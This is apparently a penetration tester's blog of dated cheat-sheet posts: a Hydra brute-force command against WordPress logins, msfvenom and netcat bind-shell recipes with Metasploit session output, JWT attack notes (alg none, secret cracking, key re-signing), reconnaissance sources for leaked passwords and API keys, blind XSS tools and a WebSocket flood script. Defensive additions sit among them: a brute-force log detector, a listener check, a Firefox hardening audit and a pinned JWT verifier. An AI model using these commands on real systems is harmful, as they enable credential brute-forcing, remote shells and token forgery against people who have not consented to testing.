Thursday, 10 January 2019

Hydra cheat sheet

WordPress:

hydra -f -l LOGIN -P /usr/share/wordlists/rockyou.txt www.website.com -S -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&redirect_to=https%3A%2F%2Fwww.website.com%2Fwp-admin%2F&wp-submit=Log In&testcookie=1:S=Location'
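On the defending side the same request pattern stands out in the web server access log: a burst of POSTs to /wp-login.php from one address that all come back 200 (the form re-rendered), possibly followed by a 302 once a password matches. The detector below is an added example in Python, not part of the original cheat sheet; the log lines, threshold and window are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined log format: source IP, timestamp, request line, status code.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
THRESHOLD = 5        # failed POSTs to wp-login.php from one IP ...
WINDOW_SECONDS = 60  # ... within this many seconds raise an alert

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path.split("?")[0], int(status)

def detect_wp_bruteforce(lines, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Return {ip: {"failed": n, "success_after_burst": bool}} for IPs over the threshold.
    A failed WordPress login re-renders the form (200); success is a 302 with Location,
    the same S=Location condition the Hydra command keys on, so a 302 after a burst matters."""
    failed = defaultdict(list)  # ip -> timestamps of failed POSTs inside the window
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, when, method, path, status = rec
        if method != "POST" or path != "/wp-login.php":
            continue
        recent = [t for t in failed[ip] if (when - t).total_seconds() <= window]
        if status == 200:
            recent.append(when)
            if len(recent) >= threshold:
                alerts.setdefault(ip, {"failed": 0, "success_after_burst": False})
                alerts[ip]["failed"] = len(recent)
        elif status in (301, 302) and ip in alerts:
            alerts[ip]["success_after_burst"] = True
        failed[ip] = recent
    return alerts

# Constructed sample lines, not real traffic: one bursting client, one ordinary user.
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Jan/2019:12:00:{s:02d} +0100] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0 (Hydra)"'
    for s in range(6)
] + [
    '203.0.113.7 - - [10/Jan/2019:12:00:07 +0100] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Hydra)"',
    '198.51.100.9 - - [10/Jan/2019:12:00:03 +0100] "POST /wp-login.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jan/2019:12:00:09 +0100] "GET /wp-admin/ HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
]
```

Feed it the real access log with `open(path)` in place of SAMPLE_LOG; a hit with `success_after_burst` set is the one to treat as a compromised account, not just noise.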

Wednesday, 12 December 2018

bind shell



msfvenom bind shell:

victim:
msfvenom -p linux/x64/shell_bind_tcp LPORT=2222 -f elf > shell.elf
./shell.elf

attacker:
nc IP_VICTIM 2222
python -c 'import pty;pty.spawn("/bin/bash")'

OR

msf exploit(multi/handler) > use multi/handler
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2222             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2222
[*] Command shell session 3 opened (10.0.3.15:46445 -> 172.21.65.139:2222) at 2018-12-12 11:54:51 +0100


ls
dirtyc0w




netcat:

victim:
nc -lvp 8080 -e /bin/bash

attacker:
nc IP_VICTIM 8080


Bind shell meterpreter

victim:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=2223 -f elf > shell_meterpreter_bind_2223.elf
chmod +x shell_meterpreter_bind_2223.elf
./shell_meterpreter_bind_2223.elf

attacker:
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2223             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2223
[*] Sending stage (861480 bytes) to 172.21.65.139
[*] Meterpreter session 6 opened (10.0.3.15:41461 -> 172.21.65.139:2223) at 2018-12-12 12:04:01 +0100

meterpreter >
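From the defender's side, a bind shell like the two above is simply a new TCP listener owned by a binary nobody expects. The check below is an added example in Python, not part of the original post: it parses `ss -ltnp` output and compares every listener against an allowlist; the allowlist and the sample output are constructed.

```python
import re

# Constructed allowlist for this host: listening port -> process expected to own it.
ALLOWED = {22: "sshd", 80: "nginx", 443: "nginx"}

# One `ss -ltnp` data row: state, queues, local addr:port, peer, owning process and pid.
SS_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+)'
)

def parse_ss(text):
    """Parse `ss -ltnp` output into (local_addr, port, process, pid) tuples."""
    rows = []
    for line in text.splitlines():
        m = SS_RE.match(line.strip())
        if m:
            addr, port, proc, pid = m.groups()
            rows.append((addr, int(port), proc, int(pid)))
    return rows

def unexpected_listeners(rows, allowed=ALLOWED):
    """Return rows whose port is not allowlisted or is owned by a different process.
    A bind shell shows up here as a fresh port (2222 above) bound to an unknown binary."""
    return [r for r in rows if allowed.get(r[1]) != r[2]]

# Constructed sample output, not taken from the session above.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511     0.0.0.0:80          0.0.0.0:*          users:(("nginx",pid=1020,fd=6))
LISTEN  0       128     [::]:22             [::]:*             users:(("sshd",pid=812,fd=4))
LISTEN  0       1       0.0.0.0:2222        0.0.0.0:*          users:(("shell.elf",pid=4711,fd=3))
"""

if __name__ == "__main__":
    for addr, port, proc, pid in unexpected_listeners(parse_ss(SAMPLE_SS)):
        print(f"unexpected listener {addr}:{port} owned by {proc} (pid {pid})")
```

On a live host pipe `ss -ltnp` into parse_ss; a process in /tmp or a home directory owning a high port is the usual giveaway, and the pid tells you what to inspect in /proc.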

Wednesday, 7 November 2018

Hardening Firefox

[about:config]
privacy.firstparty.isolate = true
privacy.resistFingerprinting = true
privacy.trackingprotection.enabled = true
privacy.donottrackheader.enabled = true
privacy.donottrackheader.value = 1
browser.cache.disk.enable = false
browser.cache.disk.filesystem_reported = 1
browser.cache.disk.smart_size.first_run = false
browser.cache.disk.cache_ssl = false
browser.cache.disk.frecency_experiment = 2
browser.cache.offline.enable = false
browser.safebrowsing.malware.enabled = false
browser.safebrowsing.phishing.enabled = false
browser.send_pings = false
browser.sessionstore.max_tabs_undo = 0
browser.urlbar.speculativeConnect.enabled = false
browser.sessionstore.privacy_level = 2
browser.privatebrowsing.autostart = true
browser.safebrowsing.appRepURL = (empty)
dom.battery.enabled = false
dom.event.clipboardevents.enabled = true
dom.indexedDB.enabled = false
dom.storage.enabled = false
geo.enabled = false
geo.wifi.uri = (empty)
media.navigator.enabled = false
network.cookie.cookieBehavior = 1
network.cookie.lifetimePolicy = 2
network.http.referer.trimmingPolicy = 2
network.http.referer.XOriginPolicy = 2
network.http.referer.XOriginTrimmingPolicy = 2
network.prefetch-next = false
network.http.referer.spoofSource = true
network.dns.disablePrefetch = true
network.IDN_show_punycode = true
webgl.disabled = true
beacon.enabled = false
media.video_stats.enabled = false
media.peerconnection.enabled = false
media.peerconnection.dtmf.enabled = false
media.peerconnection.ice.default_address_only = true
media.peerconnection.ice.no_host = true
media.peerconnection.identity.enabled = false
media.peerconnection.simulcast = false
media.peerconnection.turn.disable = true
media.peerconnection.use_document_iceservers = false
media.peerconnection.video.enabled = false
media.peerconnection.video.vp9_enabled = false
security.ssl3.rsa_aes_128_sha = false
security.ssl3.rsa_aes_256_sha = false
security.ssl3.rsa_des_ede3_sha = false
general.useragent.site_specific_overrides = true
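To confirm that a profile actually carries these settings, here is an added Python script (not part of the original post) that reads the user_pref(...) lines Firefox writes to prefs.js or user.js and reports every listed pref that is missing or differs. The expected set is a subset of the list above and the sample file is constructed.

```python
import re

# Subset of the hardening list above, as the values a compliant profile must carry.
EXPECTED = {
    "privacy.resistFingerprinting": True,
    "privacy.firstparty.isolate": True,
    "network.cookie.cookieBehavior": 1,
    "network.http.referer.XOriginPolicy": 2,
    "webgl.disabled": True,
    "media.peerconnection.enabled": False,
    "geo.wifi.uri": "",          # "(empty)" on the list means the empty string
}

# One prefs.js / user.js line: user_pref("name", value);
PREF_RE = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.+?)\);\s*$')

def parse_value(raw):
    # Values are JS literals: true/false, an integer, or a double-quoted string.
    if raw == "true":
        return True
    if raw == "false":
        return False
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    return int(raw)

def parse_prefs(text):
    prefs = {}
    for line in text.splitlines():
        m = PREF_RE.match(line)
        if m:
            prefs[m.group(1)] = parse_value(m.group(2))
    return prefs

def audit(prefs, expected=EXPECTED):
    """Return {pref: (wanted, found)} for each expected pref that is absent or differs.
    Absent means Firefox uses its built-in default, which for these keys is not the
    hardened value. Types are compared too, so an integer 1 does not pass for true."""
    return {k: (v, prefs.get(k)) for k, v in expected.items()
            if type(prefs.get(k)) is not type(v) or prefs.get(k) != v}

# Constructed sample profile, not a real prefs.js.
SAMPLE_PREFS = """\
// Mozilla User Preferences
user_pref("privacy.resistFingerprinting", true);
user_pref("privacy.firstparty.isolate", false);
user_pref("network.cookie.cookieBehavior", 1);
user_pref("network.http.referer.XOriginPolicy", 0);
user_pref("webgl.disabled", true);
user_pref("geo.wifi.uri", "");
"""
```

Run audit(parse_prefs(open(path).read())) against the profile's prefs.js after closing Firefox, since the file is rewritten on exit.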


Plugins:

https://addons.mozilla.org/en-US/firefox/addon/https-everywhere/
https://addons.mozilla.org/en-US/firefox/addon/canvasblocker/
https://addons.mozilla.org/en-US/firefox/addon/noscript/
https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/ 



Check your browser's properties with:

https://check.torproject.org/
https://ip-check.info/?lang=en
https://ipleak.net/

Thursday, 18 October 2018

JWT - JSON Web Tokens


Notes from SHP

JWT - secure exchange of JSON-based information between two applications

The encoding is plain base64 (so it provides no confidentiality)

HTTP Archive

Google BigQuery and searching HTTP Archive data (e.g. for JWT tokens, Authorization: Basic headers, etc.)

  1. Brute-force the JWT secret (e.g. with hashcat)
  2. Change the JWT signing algorithm (e.g. from HS256) to none
  • Note: on jwt.io, if you enter alg none it will not show the result (you have to base64-encode it yourself)
  3. Re-sign vulnerability - I sign my token with an RSA private key and put the RSA public key in the header

A JWT LOOKS LIKE THIS:  HEADER.PAYLOAD.SIGNATURE

sekurak.pl/jwt-ebook.pdf <- description of JWT together with a checklist
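All three attacks above rely on the verifier trusting what the token's own header says about the algorithm or the key. As an added example, not from the SHP notes, here is a minimal HS256 verifier in Python (standard library only) that pins both server-side; the secret and the token builders are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo secret; a real service loads it from configuration, never from the token.
SECRET = b"demo-shared-secret"

def b64url_decode(part):
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def sign_hs256(payload, secret=SECRET):
    # Builds HEADER.PAYLOAD.SIGNATURE; used here only to construct test tokens.
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"

def verify_hs256(token, secret=SECRET):
    """Return the payload if the token verifies, else raise ValueError.
    Algorithm and key are pinned: attack 2 (alg none) and attack 3 (key material
    the client puts in the header) are refused before any cryptography runs, and
    attack 1 is left with nothing but the entropy of the secret."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
    except ValueError:  # wrong part count, bad base64 or bad JSON
        raise ValueError("malformed token")
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    if any(k in header for k in ("jwk", "jku", "x5u", "x5c")):
        raise ValueError("key material supplied in the header is not trusted")
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))

def is_accepted(token, secret=SECRET):
    try:
        verify_hs256(token, secret)
        return True
    except ValueError:
        return False

def unsigned_token(payload):
    # Constructed negative test vector: alg none with an empty signature part.
    header = b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{b64url_encode(json.dumps(payload).encode())}."
```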

IT reconnaissance


Notes from SHP

gotcha.pw - password leaks (can the database be downloaded without the asterisks? Yes)
https://www.zoomeye.org/ / Shodan: (ZoomEye: +django +debug.) (in Shodan: has_screenshot:yes)
crt.sh - %domena.pl (the % wildcard finds subdomains)
builtwith.com/ - shows which technologies the infrastructure is built with;
the Relationship Profile tab shows tracking codes and the other sites that use the same ones :)
hardenize.com - security scanner
android.fallible.co - looks for secrets in a mobile app
publicwww.com - search engine for HTML, CSS and JavaScript source code - search here e.g. for malware, or look for API keys (by typing apikey into the search box)

github.com/michenriksen/aquatone - finds subdomains (searches everything: VirusTotal (needs an API key), crt.sh, Web Archive, etc.)

virustotal.com - search: twitter.com (for finding subdomains) / also finding virtual hosts by clicking on an IP in the search results
archive.org - looking for old links to current resources, when a new website is already up but an old resource may have been left behind; also for finding subdomains

Blind XSS


Notes from SHP


Excessy - an XSS tool using WebSockets, by Michał Bentkowski

XSS PROXY - https://github.com/securityMB/excessy


iframe sandbox as protection against XSS

  1. GET request to fetch the CSRF token
  2. Then POST to use it

Wednesday, 25 April 2018

WebSocket DoS tester

Python client - websocket denial of service tester


import ssl
import websocket

# Open a fresh connection, send one message and read the echo, 101 times in a row.
counter = 0
while counter <= 100:
    ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})
    ws.connect("wss://echo.websocket.org")
    print("Sending 'Hello, World'...")
    ws.send("Hello, World")
    print("Sent")
    print("'%s'" % counter)
    print("Receiving...")
    result = ws.recv()
    print("Received '%s'" % result)
    ws.close()
    counter += 1